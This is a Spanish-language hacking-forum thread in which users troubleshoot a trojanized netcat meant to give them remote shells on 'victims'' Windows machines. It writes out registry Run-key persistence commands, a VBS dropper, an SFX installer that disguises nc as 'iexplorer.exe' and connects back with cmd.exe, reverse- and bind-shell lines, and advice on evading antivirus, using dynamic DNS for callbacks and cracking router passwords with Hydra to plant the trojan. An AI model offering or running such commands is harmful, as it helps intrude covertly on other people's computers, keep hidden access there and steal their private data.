Aún así conocer NetCat no te hara un buen hacker, aunque te ayudara mucho. El verdadero rifle de asalto de un hacker es Perl, y eso no hay quien lo pueda discutir. Y claro, Bash... el shell de Linux...pero un buen hacker conoce prácticamente todo lo que se le cruza:  javascript, php, Perl, C, C++, Python, Pascal, JAVA, Bash, Batch, Lisp, etcétera, etcétera...

SLOAN:
De nuevo, ahora por lo de Knoppix... mmm ... debería traer NetCat instalado, es parte del kit básico de herramientas para internet de Linux. Como es un LiveDVD a menos que instales Knoppix en la máquina no podrás instalarle software nuevo. Si lo tenes en la máquina tenes basicamente dos formas de ponerle NetCat (En el pésimo caso de que no lo tenga)... una es compilarlo, la otra (más simple), es usar un administrador de paquetes (apt-get, aptitude, adept, synaptic, etc...) e instalar el paquete correspondiente.


Título: Re: Jugando con netcat
Publicado por: Enzo87 en 28 Diciembre 2007, 16:21 pm
Hola compañeros.

Tengo un problema. Estoy probando el Netcat con mi primo pero hay algo que no acaba de funcionar correctamente. Cuando yo me pongo a la escucha no me conecto con el, pero si es al revés si. ¿Que puede estar pasando? Hemos desactivado los firewalls.

Gracias!


Título: Re: Jugando con netcat
Publicado por: SLOAN en 29 Diciembre 2007, 04:53 am
Hola quiero saber como instalar el netcat en fedora. es dificil cuando no sabes como funciona un nuevo sistema operativo. por favor alguien me puede ayudar paso por paso Gracias


Título: Re: Jugando con netcat
Publicado por: D4RIO en 29 Diciembre 2007, 05:34 am
Deberia venir instalado, proba ejecutando "nc -h" en la consola... si no viene te bajas los fuentes de internet (buscalos con Google), y los compilas con gcc.

Enzo87
Si vos te pones a la escucha el debe intentar conectarse a tu IP


Título: Re: Jugando con netcat
Publicado por: Enzo87 en 29 Diciembre 2007, 12:51 pm
D4RIO, yo estoy a la escucha en el puerto 80 y cuando el se intenta conectar a mi ip no se conecta, sin embargo, si lo hacemos al revés el si obtiene shell.


Título: Re: Jugando con netcat
Publicado por: WHK en 29 Diciembre 2007, 18:32 pm
Citar
D4RIO, yo estoy a la escucha en el puerto 80 y cuando el se intenta conectar a mi ip no se conecta, sin embargo, si lo hacemos al revés el si obtiene shell.
Eso significa que no puedes abrir tu puerto en forma pública, revisa tu router y esas cosas, también que no esté en uso ese puerto por otro programa o pc dentro de la misma red si usas router, verifica tu firewall ya que también algunos antivirus lo traen incorporado, etc... si puedes hacer inversa pero no directa es porque no se está abriendo el puerto sobre tu ip pública.

En linux ya viene incorporado el netcat y si no es asi puede bajarse su código fuente y compilarlo ./configure make etc.


Título: Re: Jugando con netcat
Publicado por: WHK en 29 Diciembre 2007, 18:44 pm
Ya reestablecí todas las imagenes de los primeros post.


Título: Re: Jugando con netcat
Publicado por: Enzo87 en 29 Diciembre 2007, 21:11 pm
Citar
D4RIO, yo estoy a la escucha en el puerto 80 y cuando el se intenta conectar a mi ip no se conecta, sin embargo, si lo hacemos al revés el si obtiene shell.
Eso significa que no puedes abrir tu puerto en forma pública, revisa tu router y esas cosas, también que no esté en uso ese puerto por otro programa o pc dentro de la misma red si usas router, verifica tu firewall ya que también algunos antivirus lo traen incorporado, etc... si puedes hacer inversa pero no directa es porque no se está abriendo el puerto sobre tu ip pública.

En linux ya viene incorporado el netcat y si no es asi puede bajarse su código fuente y compilarlo ./configure make etc.

Muchas gracias WHK. El puerto que uso es el 80, que ya debería estar abierto. Y sobre revisar el router, está complicado ya que mi ISP es Tele2 y son ellos los que acceden al router  >:(
De antivirus uso Antivir de Avira, que desactivé para hacer las pruebas y el cual no lleva Firewall. De firewall uso ZoneAlarm, y le di permisos al nc.


Título: Re: Jugando con netcat
Publicado por: BBOYHACK en 6 Enero 2008, 07:58 am
como podria hacer para incluir al netcat en las aplicaciones de inicio para cada ves que el equipo inicie se ative solo se que tendria que colocarlo aqui


(HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run)


pero como podria realizarlo  desde   (msdos) hay alguna forma


Título: Re: Jugando con netcat
Publicado por: Novlucker en 6 Enero 2008, 08:27 am
Desde ms-dos sería algo así

Código:
REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v NOMBREQUEPREFIERAS /t REG_SZ /d RUTADETUBAT
  ;D


Saludos


Título: Re: Jugando con netcat
Publicado por: BBOYHACK en 6 Enero 2008, 09:33 am
Desde ms-dos sería algo así

Código:
REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v NOMBREQUEPREFIERAS /t REG_SZ /d RUTADETUBAT
  ;D


gracias ya lo pude incluir ahora cuando trato de incluirlo con un puerto ala escucha nada me da un error de
 
error:demasiados parametros de linia de comando

REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Nc /t REG_SZ /d C:nc.exe -l -p 4444 -t -e cmd.exe

eso es lo que coloco


Título: Re: Jugando con netcat
Publicado por: Maestro Oscuro en 6 Enero 2008, 23:06 pm
BUen dia amigo... le escribo para pedirle ayuda en la comprensión de su explicación para crear el troyano con netcat... segui muy metodicamente los pasos que usted indico pero no funciono... en la computadora de la victima sale que no es una aplicación valida de Win32... me interesa mucho superar esta dificultad... le pido me ayude... realmente es importante...


Título: Re: Jugando con netcat
Publicado por: Novlucker en 7 Enero 2008, 00:36 am
BBOYHACK, al escribir eso te toma como si "C:\nc.exe -l -p" y "4444" fuesen parametros separados, e igualmente ocurre con los que siguen.

Intenta lo siguiente

Código:
REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Nc /t REG_SZ /d "C:\nc.exe -l -p 4444 -t -e cmd.exe"
  ;)

Saludos


Título: Re: Jugando con netcat
Publicado por: BBOYHACK en 7 Enero 2008, 06:11 am
BUen dia amigo... le escribo para pedirle ayuda en la comprensión de su explicación para crear el troyano con netcat... segui muy metodicamente los pasos que usted indico pero no funciono... en la computadora de la victima sale que no es una aplicación valida de Win32... me interesa mucho superar esta dificultad... le pido me ayude... realmente es importante...


ok pero cual es tu problema en que parte del troyano tienes dudas dond te da el error


Título: Re: Jugando con netcat
Publicado por: Novlucker en 7 Enero 2008, 06:19 am
Citar
en la computadora de la victima sale que no es una aplicación valida de Win32

En tu computadora que sale?? supongo que lo mismo verdad??

Algunas veces esto ocurre porque luego de encriptarlo o cambiarle las imagenes el archivo queda dañado, y deja de funcionar.

Saludos


Título: Re: Jugando con netcat
Publicado por: BBOYHACK en 7 Enero 2008, 06:28 am
REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Nc /t REG_SZ /d "C:\nc.exe -l -p 4444 -t -e cmd.exe


ok perfecto ahora para que la ventana no salga cuando inicie le agrege la opcion -d

REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Nc /t REG_SZ /d "C:\nc.exe -l -d -p 4444 -t -e cmd.exe

y perfeto no sale ninguna ventana de msdos  ok aqui viene otra pregunta ahora si cierro el programa se cierra tambien tendria que esperar q la persona reiniciara el pc para que se pueda volver a cargar

como podria ponerlo que se ative cada cierto tiempo o algo haci



Título: Re: Jugando con netcat
Publicado por: BBOYHACK en 7 Enero 2008, 08:58 am
bueno ya lo pude hacer pero voy a  post aca eso tal ves alguien tenga tambien la duda para que cuando lo cierres se vuelva a cargar otra vez sin tener que reiniciar


REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Nc /t REG_SZ /d "C:\nc.exe -L -d  -p 4444 -t -e cmd.exe


si te fijais cambie solo la -l por -L de minuscula la puse en mayuscula...


Título: Re: Jugando con netcat
Publicado por: Enzo87 en 7 Enero 2008, 15:45 pm
BUen dia amigo... le escribo para pedirle ayuda en la comprensión de su explicación para crear el troyano con netcat... segui muy metodicamente los pasos que usted indico pero no funciono... en la computadora de la victima sale que no es una aplicación valida de Win32... me interesa mucho superar esta dificultad... le pido me ayude... realmente es importante...

Eso es porque has cambiado el icono a la version 1.1, prueba cambiandoselo a la versión 1.0.
Busca por los primeros post y encontraras este tema solucionado.

Saludos!!


Título: Re: Jugando con netcat
Publicado por: BBOYHACK en 18 Enero 2008, 03:40 am
amigo a ver si me pueden ayudar. tengo un pc y estoy tratando de agregar el netcat al inicio pero el equipo tiene es windows 2000 y no es el mismo comando que windows xp


con que comando lo puede agregar al inicio en windows 2000


Título: Re: Jugando con netcat
Publicado por: Novlucker en 18 Enero 2008, 23:34 pm
En W2K no existe ningun comando que modifique el registro desde consola (ms-dos)

Pero bueno, siempre hay que pensar que si no se encuentra una solución directa, al menos hay que encontrar una alternativa  :)

Como comentaba, windows 2000 no trae el comando REG, pero lo que si trae es Windows Script Host (viene por defecto a partir de win 98 :P)
Para el que no sepa que es esto, le comento que es un lenguaje interpretado que permite crear archivos por lotes (como los bat) más complejo.

Entre sus posibilidades está la de modificar el registro, y al ser interpretado, basta con volcar su codigo en un "archivo de texto", y cambiarle la extensión a *.vbs

Pero bueno, pasando ahora si al problema de BBOYHACK, he aquí el codigo *.bat que crea este *.vbs

Citar
echo set objshel = createobject("wscript.shell") >> c:\registro.vbs
echo objshel.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\NC", "C:\nc.exe -L -d  -p 4444 -t -e cmd.exe", "REG_SZ" >> c:\registro.vbs
start c:\registro.vbs

Al visualizarlo en pantalla el codigo queda algo entrecortado (igualmente creo esta bastante claro), así que por las dudas aclaro.

Línea 1 - - - - -> echo set.........
Línea 2 - - - - -> echo objshel...
Linea 3 - - - - -> start ..............

Espero te sirva  ;)

Saludos


Título: Re: Jugando con netcat
Publicado por: D4RIO en 19 Enero 2008, 01:06 am
O te podes bajar una buena utilidad de consola para la edicion del registro, o programar una xD:::


Título: Re: Jugando con netcat
Publicado por: luar123 en 22 Enero 2008, 17:31 pm
hola mi pregunta es la siguiente: en la parte del troyano donde hay que colocar la ip se debe poner la ip publica o la ip pribada, y si se debe abrir el puerto en el router
espero me puedan despejar estas dudas.
gracias


Título: Re: Jugando con netcat
Publicado por: Novlucker en 22 Enero 2008, 18:13 pm
Debes de poner al ip pública, y en el router mapear el puerto que hayas configurado, hacía la ip privada/interna.  ;D

Saludos


Título: Re: Jugando con netcat
Publicado por: KalmeniduS en 28 Enero 2008, 18:52 pm
hola que tal, exelentemente explicado, pero tengo un problema, en el equipo victima todo bien me da un pantallaso de la consola y crea el archivo en la carpeta update. Pero a la hora de abrir la consola y escrbibir "nc -vv -L -p 80" no hace nada, dice escuchando puerto y queda asi para siempre. si me pudieras decir que hago mal estaria buenisimo. Desde ya gracias


Título: Re: Jugando con netcat
Publicado por: vitaepe en 28 Enero 2008, 19:08 pm
Hola gente!! estuve leyendo algunas cosas sobre este tema, las cuales me resultaron interesantes, hasta donde pude observar solo se referian al S.O windows, y como seria jugar con netcat pero en linux en mi caso Ubuntu, solo debo agregar que no deseo que me digan como hacerlo, simplemente como se toman la molestia de explicarlo en windows tambien haganlo en linux, saludos !!  ;D


Título: Re: Jugando con netcat
Publicado por: Novlucker en 28 Enero 2008, 20:15 pm
Citar
hola que tal, exelentemente explicado, pero tengo un problema, en el equipo victima todo bien me da un pantallaso de la consola y crea el archivo en la carpeta update. Pero a la hora de abrir la consola y escrbibir "nc -vv -L -p 80" no hace nada, dice escuchando puerto y queda asi para siempre

Lo estas haciendo con conexion inversa?? Porque si es así el nc de la víctima ha intentado conectarse a tu pc y resulta ser que tu te has puesto a la escucha luego de esto, cuando el nc de la victima intentó conectarse no había nadie del otro lado  :P

Saludos

[Edito]: vitaepe, piensa que la mayoría de las personas utilizan windows, si lo que quieres son los comandos de linux simplemente teclea nc -h en Ubuntu para ver la ayuda, verás que son prácticamente iguales


Título: Re: Jugando con netcat
Publicado por: darkirax en 5 Febrero 2008, 14:12 pm
hola me e leido el tutorial pero me surgio una duda

yo tengo ip dinamica osea k despues de configurar el netcat k le voy a enviar i todo cuando me canvie la ip ya no voy a tener conexion como podria solucionar eso??


Título: Re: Jugando con netcat
Publicado por: Novlucker en 5 Febrero 2008, 19:57 pm
Si tienes ip dinámica create una cuenta en no-ip y ya no tendrás ningún tipo de problemas

Saludos


Título: Re: Jugando con netcat
Publicado por: darkirax en 5 Febrero 2008, 21:54 pm
ola gracias por la respuesta ya me e creado una cuenta en no-ip pero me pueden decir k hace exactamente i como lu utilizo para k no me canvia la ip?


gracias


Título: Re: Jugando con netcat
Publicado por: ¹4¹² en 5 Febrero 2008, 22:42 pm
Alguien podria poner comados para el manual 1 (troyanizando netcat) para ver las cuentas de msn? Q otros comandos se pueden usar?Cuales son?
SAlu2


Título: Re: Jugando con netcat
Publicado por: Novlucker en 5 Febrero 2008, 22:50 pm
ola gracias por la respuesta ya me e creado una cuenta en no-ip pero me pueden decir k hace exactamente i como lu utilizo para k no me canvia la ip?

gracias

Aquí (http://foro.elhacker.net/index.php/topic,57735.0.html) tienes la explicación - MANUAL NO-IP (http://foro.elhacker.net/index.php/topic,57735.0.html)

Saludos


Título: Re: Jugando con netcat
Publicado por: darkirax en 6 Febrero 2008, 13:59 pm
gracias por el manual ;D


Título: Re: Jugando con netcat
Publicado por: darkirax en 6 Febrero 2008, 19:57 pm
hola
tengo un pekenyo problemillacon el netcat e creado una cuenta no-ip i e creado el host
en mi ordenador abro el no ip i le doy el clic en el host luego en otro ordenador k tengo en mi casa le pongo el netcat -d -e cmd.exe darkirax.no-ip.org 80 i en mi pc le pongo en escucha al puerto 80 pero no ocurre nada... k ago mal?

si en vez de poner el host del mi ip pongo mi ip interna si k anda pero esto no me servira para gente k no este en mi red

espero respuesta

gracias


Título: Re: Jugando con netcat
Publicado por: Straust en 12 Febrero 2008, 12:54 pm
Ehholas, ahi disculpan si el comentario esta repetido pero es que es muy largo y necesito publicar esto rapido:
el problemita es que esta semana ensayando lo de troyanizar el NetCat con un amigo y resulta que el tiene el antivirus karspersky y ese antivirus me detecta el NetCa como un rootshell, entonces como hago para que no lo detecte??

salu2!!
grax


Título: Re: Jugando con netcat
Publicado por: K-19 en 14 Febrero 2008, 20:20 pm
hola
tengo un pekenyo problemillacon el netcat e creado una cuenta no-ip i e creado el host
en mi ordenador abro el no ip i le doy el clic en el host luego en otro ordenador k tengo en mi casa le pongo el netcat -d -e cmd.exe darkirax.no-ip.org 80 i en mi pc le pongo en escucha al puerto 80 pero no ocurre nada... k hago mal?

si en vez de poner el host del mi ip pongo mi ip interna si k anda pero esto no me servira para gente k no este en mi red

espero respuesta

gracias


Prueba a usar otro puerto que no sea el 80, el puerto 80 es usado por los navegadores y para protocolo http, asi que molestate en usar otro puerto, esto esta muy tratado ya, usa uno del tipo 2000 o asi.


Título: Re: Jugando con netcat
Publicado por: darkirax en 17 Febrero 2008, 22:20 pm
gracias mañana lo voy a provar


Título: Problema con Netcat Parte 1
Publicado por: Genex en 18 Febrero 2008, 05:09 am
Hola soy nuevo aca y estoy muy agradecido por toda la ayuda que le brindan a las personas que quieren empezar en esto (Me incluyo).
He estado leyendo y leyendo y resulta que no puedo resolver el problema que muchos tienen en Jugando con Netcat Parte 1:

"Windows no puede encontrar el archivo iexplorer.exe  y etc ........ "

Aca dejo el comentario de la Carnada.exe

El comentario siguiente contiene secuencias de órdenes para SFX

Path=%homedrive%%homepath%\update
SavePath
Setup=iexplorer.exe -d -e cmd.exe MI IP. 80
Presetup=%windir%\system32\cmd /c reg add HKcU\Software\Microsoft\Windows\CurrentVersion\Run /v "iexplorer" /t REG_SZ /d "%homedrive%%homepath%\update\iexplorer.exe -d -e cmd.exe MI IP. 80" /f > nul
Silent=1
Overwrite=2

Tengo 2 archivos , el carnada.exe y otro que es el nc pero que lo reenombre iexplorer.exe

Estoy usando NetCat V1.0 y desinstale el NOD32 para ver si me funcionaba. Tambien desactive el Firewall de windows y nada, el mismo error siempre.

Muchas gracias a todos nuevamente, espero que me ayuden.
Atte,
Genex.


PROBLEMA ARREGLADO...


Título: Re: Jugando con netcat
Publicado por: Genex en 18 Febrero 2008, 06:00 am
Tengo otro problemilla ahora...

Sobre el error " h_errno 11001: HOST_NOT_FOUND " WKL dijo que habia un error en la compilacion del winsock.h y dió un link para arreglar este problema pero resulta que no me funciona el link.
Alguien sabe de donde puedo bajar ese fix?
Gracias


Título: Re: Jugando con netcat
Publicado por: strongermind en 18 Febrero 2008, 09:18 am
me dize que iexplorer no es una aplikazion win32 valida
que puedo azer¿?


Título: Re: Jugando con netcat
Publicado por: Genex en 20 Febrero 2008, 06:40 am
Tengo un problemilla.
Cuando mando el troyano del Jugando con Netcat parte 1 a cualquier persona, primero dejo en escucha el puerto 80, pero cuando lo abren pasan horas y no pasa nada. Porque será?

Gracias..

PD: Ayer me tiro un error " h_errno 11001: HOST_NOT_FOUND " pero desde hoydia nisiquiera escucha nada.


Título: Re: Jugando con netcat
Publicado por: LNXMASTER en 20 Febrero 2008, 22:07 pm
chicos.. tengo un problema... capas que ya lo hablaron... pero no se,
el tema es el siguiente... yo armo todo el troyano con el netcat pero cuando lo ejecuto en mi pc me dice q la ruta de acceso es invalida.... que hago? ya probe sin cambiarle el icono. puse todo como estaba en el manual... cual es el problema?


Título: todo sobre netcat
Publicado por: softdates en 23 Febrero 2008, 02:00 am
http://usuarios.lycos.es/orlyyan/index.html

todo sobre netcat


Título: Re: Jugando con netcat
Publicado por: D4RIO en 23 Febrero 2008, 17:33 pm
Hay algunas cosa que deberian saber antes de postear preguntas:

1- El buscador no muerde: No es necesario leer todo el tema para encontrar una respuesta, el boton buscar lo hara por ustedes ; )

2- Leer algo de redes y seguridad informatica es indispensable, ya que muchos fracasan por desconocer cuestiones minimas. Un buen comienzo es el documental sobre Piratas Informaticos que podran encontrar en YouTube, en el que genios como Kevin Mitnick cuentan su experiencia. Ahi entenderan que gran parte de la penetracion de un sistema es paciencia.

3- Netcat no es la unica herramienta util. hay muchas cosas interesantes en www.thc.org, y cryptcat tambien es una buena opcion, en particular he logrado que no lo detecten muchos antivirus y herramientas.


Título: Re: Jugando con netcat
Publicado por: Frodcord en 23 Febrero 2008, 20:12 pm
Primero quiero felicitarlos por el tuto y luego deseo que me contesten unas interrogantes.

Cuando troyanizo el netcat todo me sale bien, me crea la carpeta update, se hace el registro, etc.......Pero no me quiere dar nisiquiera mi shell se queda en que esta oyendo el puerto 80 y de ahi pasa mucho tiempo y no prosigue. Tengo una ip estatica, el puerto abierto en el router, apague el firewall, no tengo antivirus.

Podria alguien decirme donde esta el error?


Título: Re: Jugando con netcat
Publicado por: Rigor Mortis en 24 Febrero 2008, 13:50 pm
he hecho el troyano con netcat i tal pero no me sale lo que tu tienes en las imagenes.:
C:\>nc -vv -L -p 80
listening on [any] 80 ...
connect to [mi ip] from 37.Red-88-15-251.dynamicIP.rima-tde.net [mi ip] 3777
GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-
excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwav
e-flash, application/x-gsarcade-launch, */*
Accept-Language: es
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.5072
7)
Host: p4
Connection: Keep-Alive

 sent 0, rcvd 394
listening on [mi ip] 80 ...

ALguien me puede decir que es esto? O que he hecho mal?


Título: Re: Jugando con netcat
Publicado por: darkirax en 24 Febrero 2008, 14:02 pm
ami ma pasava una cosa similar a esta i me dijero k provara kon otro puerto k nu sea al 80 como el 81 o uno mas alto del 2000 prouva haber si te va


Título: Re: Jugando con netcat
Publicado por: Rigor Mortis en 24 Febrero 2008, 14:23 pm
pero cuando acabas de comprimir el archivo se crea un .exe, para enviarlo tienes que comprimirlo o hay otra manera?

#Esta duda ya la solucioné#


Título: Re: Jugando con netcat
Publicado por: Rigor Mortis en 24 Febrero 2008, 16:41 pm
Jugando con Netcat VI

El atacante deberá ejecutar los comandos:


nc –vv –L –p 21
  --> La ventana por la que dará las ordenes
nc –vv –L –p 25 --> La ventana por la cual verá el resultado de las mismas.

(http://img163.¡mageshack.us/img163/1706/jugandoconnetcatvi1y2hv1.jpg)


Y la víctima debe ejecutar:
 
nc –d <IP_ATACANTE> 80 | cmd.exe | nc –d <IP_ATACANTE> 25


Lo que no entiendo es donde ejecuto todo eso, lo incluyo en el troyano o que hago?

#Por favor exploquenme como hacer tal cosa#


Título: Re: Jugando con netcat
Publicado por: DeoZamoX en 24 Febrero 2008, 23:59 pm
Ya se que esto es muy lammer, pero como le puedo abrir los puertos a alguien que esta detras de router?


Título: Re: Jugando con netcat
Publicado por: darkirax en 25 Febrero 2008, 19:34 pm
ueno despues de provar i provar con distintos puertos no hay manera de k se ma conecte simpre se me keda en listening...

no se k ago mal


Título: Re: Jugando con netcat
Publicado por: Rigor Mortis en 25 Febrero 2008, 21:25 pm
Buah aqui se amontonan las dudas...
-Cuando dice que se descomprime automaticamente en %homedrive%%homepath%\update   si no existe la carpeta update da error o windows crea una carpeta que se llame asi?
-También tengo la misma duda que darkirax respecto al no-ip. I me gustaria saber ademas si hay algun puerto que sea inservible porque lo bloquean los firewalls o algo.
-Ademas necesito respuesta a la duda de mi post anterior respecto a eso de usar 2 conexiones para que el firewall no salte.

Sé que es mucho pero por favor, ayudadnos.

Gracias.


Título: Re: Jugando con netcat
Publicado por: D4RIO en 26 Febrero 2008, 21:05 pm
Lo que necesitan es leer algo sobre firewalls y seguridad y entender como funciona netcat antes de meter comandos. ¿De qué serviría que logres la conexion si de todas formas no entendes qué hiciste?

A demás, una costumbre muy buena es "probar antes de preguntar"... eso hace cualquier hacker que se diga "curioso"... prueba. Dejenme ponerles un ejemplo simple:

Rigor Mortis pregunta:
-Cuando dice que se descomprime automaticamente en %homedrive%%homepath%\update   si no existe la carpeta update da error o windows crea una carpeta que se llame asi?

Simple... haces la prueba, que es lo que hara otro por vos si no sabe con certeza la respuesta. No estas probando un virus "Killer"... simplemente experimentas con una conexion, y en este caso, una instalación.

Respecto a No-IP sobran los manuales y tutos en internet (uno bueno: http://mundogeek.net/archivos/2005/09/28/no-ip/ (http://mundogeek.net/archivos/2005/09/28/no-ip/)). En lo personal no necesite más que seguir las instrucciones de la instalacion y lo pude usar, y automatizar para que renueve mi IP. No es cosa de Gurús.

A demás, ante la pregunta ¿Que es un DNS y como funciona? ... (que seguramente surgirá) ... tenemos dos soluciones que seguramente les pareceran una novedad: Wikipedia y Google.  :¬¬


Título: Re: Jugando con netcat
Publicado por: Rigor Mortis en 26 Febrero 2008, 22:18 pm
pero si prueba se añade al registro i todo eso... pero vale, seguiré buscando informacion.


Título: Re: Jugando con netcat
Publicado por: servidor32 en 26 Febrero 2008, 22:53 pm
D4RIO tiene razon, lo que tienen que hacer es probar cada cosa en sus maquinas antes de hacerlo en una ajena.

Y si, si se agrega al registro pero lo unico que tienes que hacer es entrar en el y borrar las entradas que añadio no es cosa dificil.


Título: Re: Jugando con netcat
Publicado por: Skar en 27 Febrero 2008, 16:59 pm
Hola muy buenas a todos.
Primero es felicitar por la guia.
Tengo un problema con Jugando con NetCat I, no consigo conectarme.
Envio el programa tal y como esta en la explicacion, un amigo (con el que hago este tipo de practicas) lo ejecuta (yo ya tengo los puertos en escucha) pero nada que no se conecta. E probado a ser yo el que me conecte a el y a voltear la shell pero nada ni de una forma ni de otra. Mi amigo desactiva los firewalls pero nada.
De todas formas seguire probando e investigando asta dar con ello y conseguir conectarme pero si alguien se le ocurre alguna posible solucion mejor que mejor.
Gracias y un saludo


Título: Re: Jugando con netcat
Publicado por: DeoZamoX en 28 Febrero 2008, 01:17 am
Lo que necesitan es leer algo sobre firewalls y seguridad y entender como funciona netcat antes de meter comandos. ¿De qué serviría que logres la conexion si de todas formas no entendes qué hiciste?

Si estoy empezando a querer abrir puertos de routers ajenos significa que ya tengo una base solida de conocimientos, si se lo que hizo el cryptcat, se como se conecta, se que es una dns, tengo no-ip, se como abrir puertos en mi propio router, hize pruebas en mi computadora y en las computadoras de la escuela, mis pruebas fueron satisfactorias y ahora lo ultimo que me falta es como poder expanderme a la red de redes... eso es todo...

Lo siento Dario... pero no por mi escasa edad pienses que tengo escasos conocimientos... por cierto, he buscado todo este tiempo en google como hacerlo, pero no he encontrado nada, por algo estoy pidiendo ayuda...


Título: Re: Jugando con netcat
Publicado por: D4RIO en 28 Febrero 2008, 22:13 pm
DeoZamoX: No me refería a tu duda sino a los repetitivos "El antivirus detecta NetCat", o "No puedo cambiarle el icono al NetCat" y eso...

En tu caso te va a ser muy difícil hacer las cosas con ese router ahí... así que tendrías que hacerte con el control del mismo.
Los routers vienen con un password por defecto y la gente no los suele cambiar. Podés consultar una Base de Datos de passwords por defecto en los routers.

Otro nombre que te dejo es THC Hydra  ; )  (Googlea...)

Hackear un router es un paso más al de saltarse Firewalls (más si hablamos del de Windows), pero con algo de paciencia e info seguramente lograrás infiltrarte ahí y plantar un NetCat Troyanizado... y porqué no otras cositas ;) (nircmd, wget, iehv, messenpass) y aprovechar la conexión.

Suerte


Título: Re: Jugando con netcat
Publicado por: DeoZamoX en 29 Febrero 2008, 04:19 am
Woow... no esperé esto pero... Gracias ^^


Título: Re: Jugando con netcat
Publicado por: elmeister en 1 Marzo 2008, 14:30 pm
supongo que en lugar de usar uestra IP, será mejor usar una cuenta de no-ip.com., sobretodo si usamos una conexion con ip dinámica, asi no hay que volver a currarse el troyano cada vez que cambies de IP


Título: Re: Jugando con netcat
Publicado por: SoulFire en 17 Marzo 2008, 01:48 am
Muy bueno, lo pondre en practica a ver que sale...


Título: Re: Jugando con netcat
Publicado por: messiah22 en 21 Marzo 2008, 20:12 pm
wenas soy nuevo y tengo un fallo mui tonto
no paso ni de la primera linea XD creo que me e saltado algo
abro el resoucer hacker hago los paso
File/Open > nc.exe, Add a new Resource abro el icono del ie
pongo lo de icongroup y abajo icon y me dice
unable to add selected icon

por que  :huh:


Título: Re: Jugando con netcat
Publicado por: sirkhawn en 29 Marzo 2008, 18:54 pm
buenas gente... antes que nada quiero agradecer este thread que es fantastico...
eh leido mucho...
practicamente 20 de sus 30 paginas... y eh aprendido mucho..
me eh conectado a mi "victima" siguiendo el paso 1 del 1º post...
lo que tengo una duda y si bien lo encontre y lo intente ... no pude realizarlo.. esto es.. como bajar a mi PC, un archivo X de la "victima"; por ejemplo, digamos, una conversacion del messenger de sus conversaciones... por dar un ejemplo...

digamos nose.. mimmamemima@hotmail.com.html

yo pove con ftp, o con el otro comando k no recuerdo en este momento ¬¬
pero no logre hacerlo...
por otro lado tampoco logre conectarme con el VNC viewer...

podrian ayudarme con esto?
...
por otro lado, es posible ver un archivo txt o htm desde la misma ventada del dos, (cmd)¿?
saludos!

EDIT:
Ya encontre la respuesta que buscaba para la transferencia de archivos, la comparto por si alguien la necesita... aca: http://l-bytes.es/resources/textos/cys/Transferencia_Shell.htm

Por otro lado, me surgio otro problema...
por alguna razon despues de un tiempo, pierdo la conexión...
y no puedo volver a conectarme
pense que se habia corrompido el netcat o algo asi..
asique hice uno nuevo y comenze a hacer pruebas con mi propia maquina.. la cuestion es que de ningun modo podia conectarme por el puerto 80, ni a mi maquina ni a ninguna...
decidi probar con el puerto 81, y exito, me conecte...
luego de un rato, perdi la conexión...
y nuevamente no puedo conectarme ni por el puerto 80 ni por el 81 , a mi maquina o a cualquier otra...
alguien sabe a que se debe?
saludos


Título: Re: Jugando con netcat
Publicado por: sniffer_666 en 2 Abril 2008, 02:40 am
yo ya tengo este programa como hago para instalarlo por que nc.exe solo me sale la ventana donde tengo algo que dice

Cmd line: y al colo car algo de este lado se cierra la pantalla ayudenme

y disculpen la ignorancia Gracias por su tiempo...


Título: Re: Jugando con netcat
Publicado por: Martín Fierro en 2 Abril 2008, 03:46 am
yo ya tengo este programa como hago para instalarlo por que nc.exe solo me sale la ventana donde tengo algo que dice

Cmd line: y al colo car algo de este lado se cierra la pantalla ayudenme

y disculpen la ignorancia Gracias por su tiempo...


Compadre, lo primero que tienes que hacer es leerte este post completito, ahi verás que es lo que pasa...

 :D :D

Bueno te ayudo, el nc no es un programa como piensas que se ejecuta y ya, es un programa de línea de comandos por lo que tendrás que aprender a usarlo abriendolo desde una consola y aprendiendote sus parámetros.

Código:
C:\Documents and Settings\Administrador.DESKTOP>nc -h
[v1.10 NT]
connect to somewhere:   nc [-options] hostname port[s] [ports] ...
listen for inbound:     nc -l -p port [options] [hostname] [port]
options:
        -d              detach from console, stealth mode

        -e prog         inbound program to exec [dangerous!!]
        -g gateway      source-routing hop point[s], up to 8
        -G num          source-routing pointer: 4, 8, 12, ...
        -h              this cruft
        -i secs         delay interval for lines sent, ports scanned
        -l              listen mode, for inbound connects
        -L              listen harder, re-listen on socket close
        -n              numeric-only IP addresses, no DNS
        -o file         hex dump of traffic
        -p port         local port number
        -r              randomize local and remote ports
        -s addr         local source address
        -t              answer TELNET negotiation
        -u              UDP mode
        -v              verbose [use twice to be more verbose]
        -w secs         timeout for connects and final net reads
        -z              zero-I/O mode [used for scanning]
port numbers can be individual or ranges: m-n [inclusive]

Código:
nc -lvvp 8080 -e cmd.exe
Sirve para dejar en la víctima un puerto abierto que al conectarlo te regale una hermosa shell.

para conectar al mismo puerto sería:

Código:
nc -vv 127.0.0.1 8080

La ip pues la tienes que cambiar por la de tu víctima..


Título: Re: Jugando con netcat
Publicado por: sniffer_666 en 2 Abril 2008, 04:13 am
gracias por su tiempo amigo....voy a leer todo el post  a ver que hay aqui....

                                              ...G::r::a::c::i::a::s...


Título: Re: Jugando con netcat
Publicado por: Wilty en 3 Abril 2008, 19:06 pm
vern soy nuevo en el foro, y este del netcat es para rograar o ocultar un troyano, segun en mis oscuras montaas de mis penamientos un antivirus por ejemplo el kaspersky, puede detectar los troyanos cuando estos se ejecutan, intente abri el Jhon y me elimino de golpe al iwal que el netcat, y otros programas...estos son troyano(me lo indica) o ya define cual es el objetivo del prograa....


Título: Re: Jugando con netcat
Publicado por: D4RIO en 4 Abril 2008, 01:55 am
